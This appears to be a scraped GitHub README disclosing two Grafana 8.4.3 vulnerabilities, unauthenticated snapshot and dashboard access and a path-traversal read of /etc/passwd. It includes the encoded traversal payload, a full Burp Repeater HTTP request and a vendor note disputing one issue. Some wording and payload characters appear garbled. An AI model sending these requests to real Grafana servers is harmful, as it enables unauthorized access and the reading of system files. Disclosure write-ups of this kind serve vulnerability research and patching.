Headline
CVE-2022-32275: grafana/README.md at main · BrotherOfJhonny/grafana
Grafana 8.4.3 allows reading files via (for example) a /dashboard/snapshot/%7B%7Bconstructor.constructor’/… /… /… /… /… /… /… /… /etc/passwd URI.
grafana
grafana 8.4.3 (b7d2911ca)
First point - CVE-2022-32276****Unauthenticated and authenticated users can send a false request for snapshot query using random key parameters, having access to the system dashboard area by going through the login page.
• Rated version: 8.4.3 (b7d2911ca) • Access the system the user is directed to the system home page, as image 1
Image 1: login form
It has been verified that an unauthenticated user knowing the vulnerable directories can enter random ID value which allows unauthenticated access to the hospitalized system pages. Parameter used: /dashboard/snapshot/*?orgId=0 /invite/:
Image 2: Unauthenticated access to snapshot list
Image 3: Unauthenticated access to the dashboard menu
Image 4: Unauthenticated access to the filter menu
Second point - CVE-2022-32275
• Rated version: 8.4.3 (b7d2911ca) • Injection of parameters in http request.
It has been verified that by injecting the following request into the login form the system returns internal page.
Image 5: login form
Viewing the request in burpsuite
Image 6: Intercepting the request by burpsuite
Change the request by adding /{{constructor.constructor’/… /… /… /… /… /… /… /… /etc/passwd?orgId=1 , encode : /dashboard/snapshot/%7B%7Bconstructor.constructor’/… /… /… /… /… /… /… /… /etc/passwd?orgId=1 HTTP/1.1
Image 7: Request changed before submission to server
Image 8: Data returned from the tampered request
POC 2
Send the request to the Burpsuite Repeater function and change the request header to:
GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1
Host: <grafana_host>:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-BR,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close-up
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Image 9: Changing the request in the repeater function.
Image 10: Unauthenticated access
References:* https://cwe.mitre.org/data/definitions/1345.html
- https://cwe.mitre.org/data/definitions/284.html
- https://cwe.mitre.org/data/definitions/552.html
- https://cwe.mitre.org/data/definitions/548.html
- https://cwe.mitre.org/data/definitions/706.html
- https://owasp.org/www-pdf-archive/OWASP_SCP_v1.3_pt-BR.pdf
Related news
** DISPUTED ** Grafana 8.4.3 allows unauthenticated access via (for example) a /dashboard/snapshot/*?orgId=0 URI. NOTE: the vendor considers this a UI bug, not a vulnerability.